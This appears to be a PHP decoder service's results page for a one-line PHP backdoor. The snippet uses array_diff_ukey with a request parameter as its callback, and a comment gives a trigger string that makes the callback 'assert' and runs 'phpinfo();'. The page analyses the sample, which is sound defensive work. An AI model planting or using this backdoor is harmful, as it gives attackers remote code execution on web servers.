Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php @array_diff_ukey(@array((string)$_REQUEST['password']=>1), @array((string)stripslas..

Decoded Output download

<?php 
@array_diff_ukey(@array((string)$_REQUEST['password']=>1), @array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']); 
//-f /root/adu.php -l /tmp/pvm.log -p "login=assert&password=phpinfo();&re_password=" 
?>

Did this file decode correctly?

Original Code

<?php
@array_diff_ukey(@array((string)$_REQUEST['password']=>1), @array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']);
//-f /root/adu.php -l /tmp/pvm.log -p "login=assert&password=phpinfo();&re_password="
?>

Function Calls

None

Variables

None

Stats

MD5 b149a42aef9dcb8835e7b38c9edeef65
Eval Count 0
Decode Time 89 ms